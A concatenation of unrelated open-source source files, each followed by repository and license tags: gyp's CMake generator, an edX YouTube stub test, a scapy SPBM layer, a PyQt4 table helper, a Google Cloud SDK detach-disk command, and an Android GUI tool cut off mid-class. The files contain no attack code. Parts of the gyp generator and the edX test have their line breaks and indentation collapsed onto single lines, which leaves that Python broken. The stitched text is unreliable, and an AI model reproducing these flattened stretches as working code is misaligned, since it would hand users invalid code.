    # Mark object sources as linkable.
if linkable_sources_name: output.write('set_source_files_properties(') WriteVariable(output, other_sources_name, '') output.write(' PROPERTIES EXTERNAL_OBJECT "TRUE")\n') # Output directory target_output_directory = spec.get('product_dir') if target_output_directory is None: if target_type in ('executable', 'loadable_module'): target_output_directory = generator_default_variables['PRODUCT_DIR'] elif target_type == 'shared_library': target_output_directory = '${builddir}/lib.${TOOLSET}' elif spec.get('standalone_static_library', False): target_output_directory = generator_default_variables['PRODUCT_DIR'] else: base_path = gyp.common.RelativePath(os.path.dirname(gyp_file), options.toplevel_dir) target_output_directory = '${obj}.${TOOLSET}' target_output_directory = ( os.path.join(target_output_directory, base_path)) cmake_target_output_directory = NormjoinPathForceCMakeSource( path_from_cmakelists_to_gyp, target_output_directory) SetTargetProperty(output, cmake_target_name, cmake_target_type.property_modifier + '_OUTPUT_DIRECTORY', cmake_target_output_directory) # Output name default_product_prefix = '' default_product_name = target_name default_product_ext = '' if target_type == 'static_library': static_library_prefix = generator_default_variables['STATIC_LIB_PREFIX'] default_product_name = RemovePrefix(default_product_name, static_library_prefix) default_product_prefix = static_library_prefix default_product_ext = generator_default_variables['STATIC_LIB_SUFFIX'] elif target_type in ('loadable_module', 'shared_library'): shared_library_prefix = generator_default_variables['SHARED_LIB_PREFIX'] default_product_name = RemovePrefix(default_product_name, shared_library_prefix) default_product_prefix = shared_library_prefix default_product_ext = generator_default_variables['SHARED_LIB_SUFFIX'] elif target_type != 'executable': print ('ERROR: What output file should be generated?', 'type', target_type, 'target', target_name) product_prefix = spec.get('product_prefix', 
                              default_product_prefix)
    product_name = spec.get('product_name', default_product_name)
    product_ext = spec.get('product_extension')
    if product_ext:
      product_ext = '.' + product_ext
    else:
      product_ext = default_product_ext

    SetTargetProperty(output, cmake_target_name, 'PREFIX', product_prefix)
    SetTargetProperty(output, cmake_target_name,
                      cmake_target_type.property_modifier + '_OUTPUT_NAME',
                      product_name)
    SetTargetProperty(output, cmake_target_name, 'SUFFIX', product_ext)

    # Make the output of this target referenceable as a source.
    cmake_target_output_basename = product_prefix + product_name + product_ext
    cmake_target_output = os.path.join(cmake_target_output_directory,
                                       cmake_target_output_basename)
    SetFileProperty(output, cmake_target_output, 'GENERATED', ['TRUE'], '')

  # Includes
  includes = config.get('include_dirs')
  if includes:
    # This (target include directories) is what requires CMake 2.8.8
    includes_name = cmake_target_name + '__include_dirs'
    SetVariableList(output, includes_name,
        [NormjoinPathForceCMakeSource(path_from_cmakelists_to_gyp, include)
         for include in includes])
    output.write('set_property(TARGET ')
    output.write(cmake_target_name)
    output.write(' APPEND PROPERTY INCLUDE_DIRECTORIES ')
    WriteVariable(output, includes_name, '')
    output.write(')\n')

  # Defines
  defines = config.get('defines')
  if defines is not None:
    SetTargetProperty(output,
                      cmake_target_name,
                      'COMPILE_DEFINITIONS',
                      defines,
                      ';')

  # Compile Flags - http://www.cmake.org/Bug/view.php?id=6493
  # CMake currently does not have target C and CXX flags.
  # So, instead of doing...

  # cflags_c = config.get('cflags_c')
  # if cflags_c is not None:
  #   SetTargetProperty(output, cmake_target_name,
  #                     'C_COMPILE_FLAGS', cflags_c, ' ')

  # cflags_cc = config.get('cflags_cc')
  # if cflags_cc is not None:
  #   SetTargetProperty(output, cmake_target_name,
  #                     'CXX_COMPILE_FLAGS', cflags_cc, ' ')

  # Instead we must...
  cflags = config.get('cflags', [])
  cflags_c = config.get('cflags_c', [])
  cflags_cxx = config.get('cflags_cc', [])
  # When the language-specific flags are irrelevant (no such sources, or no
  # such flags), a single target-level COMPILE_FLAGS suffices; otherwise fall
  # back to per-file properties.
  if (not cflags_c or not c_sources) and (not cflags_cxx or not cxx_sources):
    SetTargetProperty(output, cmake_target_name, 'COMPILE_FLAGS', cflags, ' ')

  elif c_sources and not (s_sources or cxx_sources):
    flags = []
    flags.extend(cflags)
    flags.extend(cflags_c)
    SetTargetProperty(output, cmake_target_name, 'COMPILE_FLAGS', flags, ' ')

  elif cxx_sources and not (s_sources or c_sources):
    flags = []
    flags.extend(cflags)
    flags.extend(cflags_cxx)
    SetTargetProperty(output, cmake_target_name, 'COMPILE_FLAGS', flags, ' ')

  else:
    # TODO: This is broken, one cannot generally set properties on files,
    # as other targets may require different properties on the same files.
    if s_sources and cflags:
      SetFilesProperty(output, s_sources_name, 'COMPILE_FLAGS', cflags, ' ')

    if c_sources and (cflags or cflags_c):
      flags = []
      flags.extend(cflags)
      flags.extend(cflags_c)
      SetFilesProperty(output, c_sources_name, 'COMPILE_FLAGS', flags, ' ')

    if cxx_sources and (cflags or cflags_cxx):
      flags = []
      flags.extend(cflags)
      flags.extend(cflags_cxx)
      SetFilesProperty(output, cxx_sources_name, 'COMPILE_FLAGS', flags, ' ')

  # Linker flags
  ldflags = config.get('ldflags')
  if ldflags is not None:
    SetTargetProperty(output, cmake_target_name, 'LINK_FLAGS', ldflags, ' ')

  # Note on Dependencies and Libraries:
  # CMake wants to handle link order, resolving the link line up front.
  # Gyp does not retain or enforce specifying enough information to do so.
  # So do as other gyp generators and use --start-group and --end-group.
  # Give CMake as little information as possible so that it doesn't mess it up.
  # Dependencies
  rawDeps = spec.get('dependencies', [])

  static_deps = []
  shared_deps = []
  other_deps = []
  for rawDep in rawDeps:
    dep_cmake_name = namer.CreateCMakeTargetName(rawDep)
    dep_spec = target_dicts.get(rawDep, {})
    dep_target_type = dep_spec.get('type', None)

    if dep_target_type == 'static_library':
      static_deps.append(dep_cmake_name)
    elif dep_target_type == 'shared_library':
      shared_deps.append(dep_cmake_name)
    else:
      other_deps.append(dep_cmake_name)

  # ensure all external dependencies are complete before internal dependencies
  # extra_deps currently only depend on their own deps, so otherwise run early
  if static_deps or shared_deps or other_deps:
    for extra_dep in extra_deps:
      output.write('add_dependencies(')
      output.write(extra_dep)
      output.write('\n')
      for deps in (static_deps, shared_deps, other_deps):
        for dep in gyp.common.uniquer(deps):
          output.write(' ')
          output.write(dep)
          output.write('\n')
      output.write(')\n')

  linkable = target_type in ('executable', 'loadable_module', 'shared_library')
  other_deps.extend(extra_deps)
  # Non-linkable targets still need ordering edges on their library deps;
  # linkable targets get those via target_link_libraries below.
  if other_deps or (not linkable and (static_deps or shared_deps)):
    output.write('add_dependencies(')
    output.write(cmake_target_name)
    output.write('\n')
    for dep in gyp.common.uniquer(other_deps):
      output.write(' ')
      output.write(dep)
      output.write('\n')
    if not linkable:
      for deps in (static_deps, shared_deps):
        for lib_dep in gyp.common.uniquer(deps):
          output.write(' ')
          output.write(lib_dep)
          output.write('\n')
    output.write(')\n')

  # Libraries
  if linkable:
    external_libs = [lib for lib in spec.get('libraries', []) if len(lib) > 0]
    if external_libs or static_deps or shared_deps:
      output.write('target_link_libraries(')
      output.write(cmake_target_name)
      output.write('\n')
      if static_deps:
        # Wrap possibly-circular static libraries in --start/--end-group.
        write_group = circular_libs and len(static_deps) > 1
        if write_group:
          output.write('-Wl,--start-group\n')
        for dep in gyp.common.uniquer(static_deps):
          output.write(' ')
          output.write(dep)
          output.write('\n')
        if write_group:
          output.write('-Wl,--end-group\n')
      if shared_deps:
        for dep in gyp.common.uniquer(shared_deps):
          output.write(' ')
          output.write(dep)
          output.write('\n')
      if external_libs:
        for lib in gyp.common.uniquer(external_libs):
          output.write(' ')
          output.write(lib)
          output.write('\n')

      output.write(')\n')

  UnsetVariable(output, 'TOOLSET')
  UnsetVariable(output, 'TARGET')


def GenerateOutputForConfig(target_list, target_dicts, data,
                            params, config_to_use):
  # Writes <build_dir>/<config>/CMakeLists.txt covering every target for one
  # gyp configuration.
  options = params['options']
  generator_flags = params['generator_flags']

  # generator_dir: relative path from pwd to where make puts build files.
  # Makes migrating from make to cmake easier, cmake doesn't put anything here.
  # Each Gyp configuration creates a different CMakeLists.txt file
  # to avoid incompatibilities between Gyp and CMake configurations.
  generator_dir = os.path.relpath(options.generator_output or '.')

  # output_dir: relative path from generator_dir to the build directory.
  output_dir = generator_flags.get('output_dir', 'out')

  # build_dir: relative path from source root to our output files.
  # e.g. "out/Debug"
  build_dir = os.path.normpath(os.path.join(generator_dir,
                                            output_dir,
                                            config_to_use))

  toplevel_build = os.path.join(options.toplevel_dir, build_dir)

  output_file = os.path.join(toplevel_build, 'CMakeLists.txt')
  gyp.common.EnsureDirExists(output_file)

  output = open(output_file, 'w')
  output.write('cmake_minimum_required(VERSION 2.8.8 FATAL_ERROR)\n')
  output.write('cmake_policy(VERSION 2.8.8)\n')

  # The project is named after the last target in the list.
  gyp_file, project_target, _ = gyp.common.ParseQualifiedTarget(target_list[-1])
  output.write('project(')
  output.write(project_target)
  output.write(')\n')

  SetVariable(output, 'configuration', config_to_use)

  ar = None
  cc = None
  cxx = None

  # Toolchain: gyp 'make_global_settings' first, then environment overrides.
  make_global_settings = data[gyp_file].get('make_global_settings', [])
  build_to_top = gyp.common.InvertRelativePath(build_dir,
                                               options.toplevel_dir)
  for key, value in make_global_settings:
    if key == 'AR':
      ar = os.path.join(build_to_top, value)
    if key == 'CC':
      cc = os.path.join(build_to_top, value)
    if key == 'CXX':
      cxx = os.path.join(build_to_top, value)

  ar = gyp.common.GetEnvironFallback(['AR_target', 'AR'], ar)
  cc = gyp.common.GetEnvironFallback(['CC_target', 'CC'], cc)
  cxx = gyp.common.GetEnvironFallback(['CXX_target', 'CXX'], cxx)

  if ar:
    SetVariable(output, 'CMAKE_AR', ar)
  if cc:
    SetVariable(output, 'CMAKE_C_COMPILER', cc)
  if cxx:
    SetVariable(output, 'CMAKE_CXX_COMPILER', cxx)

  # The following appears to be as-yet undocumented.
  # http://public.kitware.com/Bug/view.php?id=8392
  output.write('enable_language(ASM)\n')

  # ASM-ATT does not support .S files.
  # output.write('enable_language(ASM-ATT)\n')

  if cc:
    SetVariable(output, 'CMAKE_ASM_COMPILER', cc)

  SetVariable(output, 'builddir', '${CMAKE_CURRENT_BINARY_DIR}')
  SetVariable(output, 'obj', '${builddir}/obj')
  output.write('\n')

  # TODO: Undocumented/unsupported (the CMake Java generator depends on it).
  # CMake by default names the object resulting from foo.c to be foo.c.o.
  # Gyp traditionally names the object resulting from foo.c foo.o.
  # This should be irrelevant, but some targets extract .o files from .a
  # and depend on the name of the extracted .o files.
  output.write('set(CMAKE_C_OUTPUT_EXTENSION_REPLACE 1)\n')
  output.write('set(CMAKE_CXX_OUTPUT_EXTENSION_REPLACE 1)\n')
  output.write('\n')

  # Force ninja to use rsp files. Otherwise link and ar lines can get too long,
  # resulting in 'Argument list too long' errors.
  output.write('set(CMAKE_NINJA_FORCE_RESPONSE_FILE 1)\n')
  output.write('\n')

  namer = CMakeNamer(target_list)

  # The list of targets upon which the 'all' target should depend.
  # CMake has its own implicit 'all' target, one is not created explicitly.
all_qualified_targets = set() for build_file in params['build_files']: for qualified_target in gyp.common.AllTargets(target_list, target_dicts, os.path.normpath(build_file)): all_qualified_targets.add(qualified_target) for qualified_target in target_list: WriteTarget(namer, qualified_target, target_dicts, build_dir, config_to_use, options, generator_flags, all_qualified_targets, output) output.close() def PerformBuild(data, configurations, params): options = params['options'] generator_flags = params['generator_flags'] # generator_dir: relative path from pwd to where make puts build files. # Makes migrating from make to cmake easier, cmake doesn't put anything here. generator_dir = os.path.relpath(options.generator_output or '.') # output_dir: relative path from generator_dir to the build directory. output_dir = generator_flags.get('output_dir', 'out') for config_name in configurations: # build_dir: relative path from source root to our output files. # e.g. "out/Debug" build_dir = os.path.normpath(os.path.join(generator_dir, output_dir, config_name)) arguments = ['cmake', '-G', 'Ninja'] print 'Generating [%s]: %s' % (config_name, arguments) subprocess.check_call(arguments, cwd=build_dir) arguments = ['ninja', '-C', build_dir] print 'Building [%s]: %s' % (config_name, arguments) subprocess.check_call(arguments) def CallGenerateOutputForConfig(arglist): # Ignore the interrupt signal so that the parent process catches it and # kills all multiprocessing children. 
signal.signal(signal.SIGINT, signal.SIG_IGN) target_list, target_dicts, data, params, config_name = arglist GenerateOutputForConfig(target_list, target_dicts, data, params, config_name) def GenerateOutput(target_list, target_dicts, data, params): user_config = params.get('generator_flags', {}).get('config', None) if user_config: GenerateOutputForConfig(target_list, target_dicts, data, params, user_config) else: config_names = target_dicts[target_list[0]]['configurations'].keys() if params['parallel']: try: pool = multiprocessing.Pool(len(config_names)) arglists = [] for config_name in config_names: arglists.append((target_list, target_dicts, data, params, config_name)) pool.map(CallGenerateOutputForConfig, arglists) except KeyboardInterrupt, e: pool.terminate() raise e else: for config_name in config_names: GenerateOutputForConfig(target_list, target_dicts, data, params, config_name)
apache-2.0
deepsrijit1105/edx-platform
common/djangoapps/terrain/stubs/tests/test_youtube_stub.py
172
2639
""" Unit test for stub YouTube implementation. """ import unittest import requests from ..youtube import StubYouTubeService class StubYouTubeServiceTest(unittest.TestCase): def setUp(self): super(StubYouTubeServiceTest, self).setUp() self.server = StubYouTubeService() self.url = "http://127.0.0.1:{0}/".format(self.server.port) self.server.config['time_to_response'] = 0.0 self.addCleanup(self.server.shutdown) def test_unused_url(self): response = requests.get(self.url + 'unused_url') self.assertEqual("Unused url", response.content) @unittest.skip('Failing intermittently due to inconsistent responses from YT. See TE-871') def test_video_url(self): response = requests.get( self.url + 'test_youtube/OEoXaMPEzfM?v=2&alt=jsonc&callback=callback_func' ) # YouTube metadata for video `OEoXaMPEzfM` states that duration is 116. self.assertEqual( 'callback_func({"data": {"duration": 116, "message": "I\'m youtube.", "id": "OEoXaMPEzfM"}})', response.content ) def test_transcript_url_equal(self): response = requests.get( self.url + 'test_transcripts_youtube/t__eq_exist' ) self.assertEqual( "".join([ '<?xml version="1.0" encoding="utf-8" ?>', '<transcript><text start="1.0" dur="1.0">', 'Equal transcripts</text></transcript>' ]), response.content ) def test_transcript_url_not_equal(self): response = requests.get( self.url + 'test_transcripts_youtube/t_neq_exist', ) self.assertEqual( "".join([ '<?xml version="1.0" encoding="utf-8" ?>', '<transcript><text start="1.1" dur="5.5">', 'Transcripts sample, different that on server', '</text></transcript>' ]), response.content ) def test_transcript_not_found(self): response = requests.get(self.url + 'test_transcripts_youtube/some_id') self.assertEqual(404, response.status_code) def test_reset_configuration(self): reset_config_url = self.url + 'del_config' # add some configuration data self.server.config['test_reset'] = 'This is a reset config test' # reset server configuration response = requests.delete(reset_config_url) 
self.assertEqual(response.status_code, 200) # ensure that server config dict is empty after successful reset self.assertEqual(self.server.config, {})
agpl-3.0
guedou/scapy-appveyor
scapy/contrib/spbm.py
3
1670
# IEEE 802.1aq - Shortest Path Bridging Mac-in-mac (SPBM):
# Ethernet based link state protocol that enables Layer 2 Unicast, Layer 2
# Multicast, Layer 3 Unicast, and Layer 3 Multicast virtualized services
# https://en.wikipedia.org/wiki/IEEE_802.1aq
# Modeled after the scapy VXLAN contribution

#############################################################
# Example SPB Frame Creation
#
# Note the outer Dot1Q Ethertype marking (0x88e7)
#############################################################
# backboneEther = Ether(dst='00:bb:00:00:90:00', src='00:bb:00:00:40:00', type=0x8100)
# backboneDot1Q = Dot1Q(vlan=4051,type=0x88e7)
# backboneServiceID = SPBM(prio=1,isid=20011)
# customerEther = Ether(dst='00:1b:4f:5e:ca:00',src='00:00:00:00:00:01',type=0x8100)
# customerDot1Q = Dot1Q(prio=1,vlan=11,type=0x0800)
# customerIP = IP(src='10.100.11.10',dst='10.100.12.10',id=0x0629,len=106)
# customerUDP = UDP(sport=1024,dport=1025,chksum=0,len=86)
#
# spb_example = backboneEther/backboneDot1Q/backboneServiceID/customerEther/customerDot1Q/customerIP/customerUDP/"Payload"

from scapy.packet import Packet, bind_layers
from scapy.fields import *
from scapy.layers.l2 import Ether, Dot1Q


class SPBM(Packet):
    """IEEE 802.1aq backbone service instance tag (I-TAG).

    Four-byte header: 3-bit priority, drop-eligible bit (dei),
    no-customer-addresses bit (nca), two reserved fields, and the
    24-bit backbone service instance identifier (isid).
    """
    name = "SPBM"
    fields_desc = [BitField("prio", 0, 3),
                   BitField("dei", 0, 1),
                   BitField("nca", 0, 1),
                   BitField("res1", 0, 1),
                   BitField("res2", 0, 2),
                   ThreeBytesField("isid", 0)]

    def mysummary(self):
        # BUGFIX: the original format string was missing the closing ")",
        # producing summaries like "SPBM (isid=42".
        return self.sprintf("SPBM (isid=%SPBM.isid%)")

# Backbone Dot1Q ethertype 0x88e7 introduces the SPBM service tag; the
# payload that follows is a complete (customer) Ethernet frame.
bind_layers(Dot1Q, SPBM, type=0x88e7)
bind_layers(SPBM, Ether)
gpl-2.0
informaticameg/Posta
GUI/mtw_pos.py
1
6185
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#  Copyright 2011 Ferreyra, Jonathan <jalejandroferreyra@gmail.com>
#  Copyright 2011 Fernandez, Emiliano <emilianohfernandez@gmail.com>
#
#  This program is free software; you can redistribute it and/or modify
#  it under the terms of the GNU General Public License as published by
#  the Free Software Foundation; either version 2 of the License, or
#  (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program; if not, write to the Free Software
#  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#  MA 02110-1301, USA.

from PyQt4 import QtCore, QtGui


class MyTableWidget():
    """Convenience wrapper around a QTableWidget: configures headers and
    selection behaviour, and exposes helpers to fill and read rows."""

    # NOTE(review): `listadealineaciones = []` is a mutable default argument;
    # it is only read here, never mutated, so it is harmless — but confirm.
    def __init__(self, TW, listadecolumnas, listadealineaciones = [],
                 indexColumn = 1, widthColumn = 400):
        # TW: the QTableWidget instance being wrapped.
        # listadecolumnas: list of column header names.
        # listadealineaciones: optional list of 'L'/'C'/'R' alignment codes,
        # one per column; defaults to center for every column.
        self.__widget = TW
        quitAction = QtGui.QAction("Quit", self.__widget)
        self.__widget.addAction(quitAction)
        self.__widget.horizontalHeader().setDefaultSectionSize(120)
        # NEXT: split the fields in the table and place the numbers properly
        self.__widget.horizontalHeader().setResizeMode(0)  # maximizes the fields in the table
        self.__widget.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
        self.__widget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.__columns = listadecolumnas
        # 'indexColumn' is an integer giving the position of the column
        # whose width should be set explicitly.
        self.__indexColumn = indexColumn
        # 'widthColumn' is the width value for that column.
        self.__widthColumn = widthColumn
        if listadealineaciones:
            # Map single-letter codes to Qt alignment flags.
            alineaciones = {
                'L': QtCore.Qt.AlignLeft,
                'C': QtCore.Qt.AlignCenter,
                'R': QtCore.Qt.AlignRight
            }
            self.__columns_align = [alineaciones[ali] for ali in listadealineaciones]
        else:
            self.__columns_align = [QtCore.Qt.AlignCenter] * len(listadecolumnas)

        self.__widget.setColumnCount(len(self.__columns))
        for i in xrange(self.__widget.columnCount()):
            # set horizontal headers
            item = QtGui.QTableWidgetItem(self.__columns[i].capitalize())  # the text
            item.setTextAlignment(QtCore.Qt.AlignCenter)  # the alignment
            self.__widget.setHorizontalHeaderItem(i, item)

    def appendItem(self, listadedatos):
        """Append one row; None cells are rendered as empty strings."""
        alineaciones = self.__columns_align

        def aux(x, cell):
            # Build a read-only cell with the column's configured alignment.
            item = QtGui.QTableWidgetItem(unicode(cell))  # the text
            item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)
            item.setTextAlignment(alineaciones[x])  # the alignment
            widget.setItem(y, x, item)

        widget = self.__widget
        y = widget.rowCount()
        if listadedatos != None:
            listadedatos = map(lambda valor: '' if valor is None else valor, listadedatos)
            widget.setRowCount(y + 1)
            [aux(x, cell) for x, cell in enumerate(listadedatos)]
            widget.setColumnWidth(self.__indexColumn, self.__widthColumn)

    def addItems(self, DATA):
        """Replace the table contents with DATA (a list of row lists)."""
        alineaciones = self.__columns_align

        def addOneItem(listadedatos, y, indexCol, widthCol):
            def aux(x, cell):
                item = QtGui.QTableWidgetItem(unicode(cell))  # the text
                item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable)
                item.setTextAlignment(alineaciones[x])  # the alignment
                widget.setItem(y, x, item)

            # set the column width
            widget.setColumnWidth(indexCol, widthCol)
            # Keep the UI responsive while filling a potentially large table.
            QtGui.QApplication.processEvents()
            listadedatos = ['' if dato is None else dato for dato in listadedatos]
            [aux(x, cell) for x, cell in enumerate(listadedatos)]

        if DATA != None:
            widget = self.__widget
            self.fullClear()
            widget.setRowCount(len(DATA))
            [addOneItem(data, indice, self.__indexColumn, self.__widthColumn)
             for indice, data in enumerate(DATA)]

    def getRowString(self, item = 'null'):
        """Return a tuple of unicode strings with the table-widget data of
        the currently selected row (or of row *item* when given).
        Returns None when no row is selected or a cell is missing."""
        tablewidget = self.__widget
        tamano = tablewidget.columnCount()
        try:
            if item != 'null':
                x = item
            else:
                x = tablewidget.currentItem().row()
            datos = []
            for num in range(tamano):
                qs = tablewidget.item(x, num).text()
                datos.append(unicode(qs.toUtf8(), 'utf-8'))
            return tuple(datos)
        except Exception:
            # No current item / empty cell: caller treats None as "no row".
            return None

    def getListSelectedRows(self):
        """Return the data tuples of every currently selected row."""
        seleccionados = self.__widget.selectionModel().selectedRows()
        rows = [self.getRowString(idx.row()) for idx in seleccionados]
        return rows

    def getAllItems(self):
        """Return the data tuples of every row in the table."""
        tamano = self.__widget.rowCount()
        allitemstring = [self.getRowString(y) for y in range(tamano)]
        return allitemstring

    def fullClear(self):
        """Remove all rows (headers are preserved)."""
        self.widget.setRowCount(0)

    def __get_widget(self):
        return self.__widget

    def __set_widget(self, value):
        self.__widget = value

    widget = property(__get_widget, __set_widget, "widget's docstring")


def main():
    return 0

if __name__ == '__main__':
    main()
gpl-3.0
KaranToor/MA450
google-cloud-sdk/.install/.backup/lib/surface/compute/instances/detach_disk.py
3
4599
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for detaching a disk from an instance."""
import copy

from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.command_lib.compute import flags
from googlecloudsdk.command_lib.compute.instances import flags as instance_flags


class DetachDisk(base_classes.ReadWriteCommand):
  """Detach disks from Compute Engine virtual machine instances.

  *{command}* is used to detach disks from virtual machines.

  Detaching a disk without first unmounting it may result in
  incomplete I/O operations and data corruption.
  To unmount a persistent disk on a Linux-based image,
  ssh into the instance and run:

    $ sudo umount /dev/disk/by-id/google-DEVICE_NAME
  """

  @staticmethod
  def Args(parser):
    # The user must identify the disk either by resource name or by
    # guest-visible device name — never both.
    instance_flags.INSTANCE_ARG.AddArgument(parser)
    disk_group = parser.add_mutually_exclusive_group(required=True)

    disk_name = disk_group.add_argument(
        '--disk',
        help='Specify a disk to remove by persistent disk name.')
    disk_name.detailed_help = """\
        Specifies a disk to detach by its resource name. If you specify a
        disk to remove by persistent disk name, then you must not specify its
        device name using the ``--device-name'' flag.
        """

    device_name = disk_group.add_argument(
        '--device-name',
        help=('Specify a disk to remove by the name the guest operating '
              'system sees.'))
    device_name.detailed_help = """\
        Specifies a disk to detach by its device name, which is the name
        that the guest operating system sees. The device name is set
        at the time that the disk is attached to the instance, and needs not be
        the same as the persistent disk name. If the disk's device name is
        specified, then its persistent disk name must not be specified
        using the ``--disk'' flag.
        """

  @property
  def service(self):
    return self.compute.instances

  @property
  def resource_type(self):
    return 'instances'

  def CreateReference(self, args):
    # Resolve the instance reference, prompting for zone if necessary.
    return instance_flags.INSTANCE_ARG.ResolveAsResource(
        args, self.resources, scope_lister=flags.GetDefaultScopeLister(
            self.compute_client, self.project))

  def GetGetRequest(self, args):
    # Read request: fetch the current instance so Modify() can diff disks.
    return (self.service,
            'Get',
            self.messages.ComputeInstancesGetRequest(
                instance=self.ref.Name(),
                project=self.project,
                zone=self.ref.zone))

  def GetSetRequest(self, args, replacement, existing):
    # The detached disk is the single device name present in the existing
    # instance but absent from the replacement built by Modify().
    removed_disk = list(
        set(disk.deviceName for disk in existing.disks) -
        set(disk.deviceName for disk in replacement.disks))[0]

    return (self.service,
            'DetachDisk',
            self.messages.ComputeInstancesDetachDiskRequest(
                deviceName=removed_disk,
                instance=self.ref.Name(),
                project=self.project,
                zone=self.ref.zone))

  def Modify(self, args, existing):
    # Build a copy of the instance without the requested disk; comparing
    # lengths afterwards detects "disk was not attached" and raises.
    replacement = copy.deepcopy(existing)

    if args.disk:
      disk_ref = self.resources.Parse(
          args.disk, collection='compute.disks',
          params={'zone': self.ref.zone})

      replacement.disks = [disk for disk in existing.disks
                           if disk.source != disk_ref.SelfLink()]

      if len(existing.disks) == len(replacement.disks):
        raise exceptions.ToolException(
            'Disk [{0}] is not attached to instance [{1}] in zone [{2}].'
            .format(disk_ref.Name(), self.ref.Name(), self.ref.zone))

    else:
      replacement.disks = [disk for disk in existing.disks
                           if disk.deviceName != args.device_name]

      if len(existing.disks) == len(replacement.disks):
        raise exceptions.ToolException(
            'No disk with device name [{0}] is attached to instance [{1}] in '
            'zone [{2}].'
            .format(args.device_name, self.ref.Name(), self.ref.zone))

    return replacement
apache-2.0
oicebot/androidtool
androidtool.py
1
9538
#! /usr/bin/env python
#
# GUI module generated by PAGE version 4.7
# In conjunction with Tcl version 8.6
#    Mar 22, 2016 10:04:14 AM
import sys

# Support both Python 2 (Tkinter/ttk) and Python 3 (tkinter) imports;
# py3 records which branch was taken for later geometry-method copying.
try:
    from Tkinter import *
except ImportError:
    from tkinter import *

try:
    import ttk
    py3 = 0
except ImportError:
    import tkinter.ttk as ttk
    py3 = 1

import androidtool_support

def vp_start_gui():
    '''Starting point when module is the main routine.'''
    global val, w, root
    root = Tk()
    androidtool_support.set_Tk_var()
    top = Android_Tools(root)
    androidtool_support.init(root, top)
    #ubuntutool_support.init(root, top)
    root.mainloop()

w = None
def create_Android_Tools(root, *args, **kwargs):
    '''Starting point when module is imported by another program.'''
    global w, w_win, rt
    rt = root
    w = Toplevel(root)
    androidtool_support.set_Tk_var()
    top = Android_Tools(w)
    androidtool_support.init(w, top, *args, **kwargs)
    return (w, top)

def destroy_Android_Tools():
    # Tear down the toplevel created by create_Android_Tools.
    global w
    w.destroy()
    w = None


class Android_Tools:
    def __init__(self, top=None):
        '''This class configures and populates the toplevel window.
           top is the toplevel containing window.'''
        _bgcolor = '#d9d9d9'  # X11 color: 'gray85'
        _fgcolor = '#000000'  # X11 color: 'black'
        _compcolor = '#d9d9d9' # X11 color: 'gray85'
        _ana1color = '#d9d9d9' # X11 color: 'gray85'
        _ana2color = '#d9d9d9' # X11 color: 'gray85'
        # Shared ttk style for every widget in the window.
        self.style = ttk.Style()
        if sys.platform == "win32":
            self.style.theme_use('winnative')
        self.style.configure('.', background=_bgcolor)
        self.style.configure('.', foreground=_fgcolor)
        self.style.configure('.', font="TkDefaultFont")
        self.style.map('.', background=
            [('selected', _compcolor), ('active', _ana2color)])

        top.geometry("700x600+1129+678")
        top.title("Android Tools")
        top.configure(highlightcolor="black")

        # Device-selection prompt label (top-left).
        self.TL_select = ttk.Label(top)
        self.TL_select.place(relx=0.01, rely=0.02, height=19, width=147)
        self.TL_select.configure(background=_bgcolor)
        self.TL_select.configure(foreground="#000000")
        self.TL_select.configure(relief=FLAT)
        self.TL_select.configure(text='''Please select target devices:''')

        #self.TB_refreshdev = ttk.Button(top)
        #self.TB_refreshdev.place(relx=0.31, rely=0.03, height=28, width=74)
        #self.TB_refreshdev.configure(command=androidtool_support.refresh_devices)
        #self.TB_refreshdev.configure(takefocus="")
        #self.TB_refreshdev.configure(text='''Refresh''')

        # Combobox of attached devices; re-queries the device list each time
        # the dropdown opens (postcommand).
        self.TC_devices = ttk.Combobox(top, postcommand=androidtool_support.refresh_devices)
        self.TC_devices.place(relx=0.01, rely=0.05, relheight=0.04, relwidth=0.3)
        self.TC_devices.configure(textvariable=androidtool_support.combobox)
        self.TC_devices.configure(takefocus="")
        self.TC_devices.bind("<<ComboboxSelected>>", androidtool_support.newselection)

        # Label showing info about the currently selected device.
        self.TL_devicesinfo = ttk.Label(top)
        self.TL_devicesinfo.place(relx=0.44, rely=0.02, height=21, relwidth=0.45)
        self.TL_devicesinfo.configure(background=_bgcolor)
        self.TL_devicesinfo.configure(foreground="#000000")
        self.TL_devicesinfo.configure(relief=FLAT)
        self.TL_devicesinfo.configure(textvariable=androidtool_support.device_info)
        self.TL_devicesinfo.configure(width=193)

        # Left pane: local filesystem listing.
        self.List_local = ScrolledListBox(top)
        self.List_local.place(relx=0.01, rely=0.12, relheight=0.86, relwidth=0.45)
        self.List_local.configure(background="white")
        self.List_local.configure(font="TkFixedFont")
        self.List_local.configure(highlightcolor="#d9d9d9")
        self.List_local.configure(selectbackground="#c4c4c4")
        self.List_local.configure(width=10)
        self.List_local.bind("<Double-Button-1>", androidtool_support.double_click)

        # Right pane: device filesystem listing.
        self.List_device = ScrolledListBox(top)
        self.List_device.place(relx=0.54, rely=0.12, relheight=0.86, relwidth=0.45)
        self.List_device.configure(background="white")
        self.List_device.configure(font="TkFixedFont")
        self.List_device.configure(highlightcolor="#d9d9d9")
        self.List_device.configure(selectbackground="#c4c4c4")
        self.List_device.configure(width=10)
        self.List_device.bind("<Double-Button-1>", androidtool_support.double_click2)

        # Middle action buttons: push ("->"), pull ("<-"), refresh ("@"),
        # install APK ("X").
        self.TB_push = ttk.Button(top)
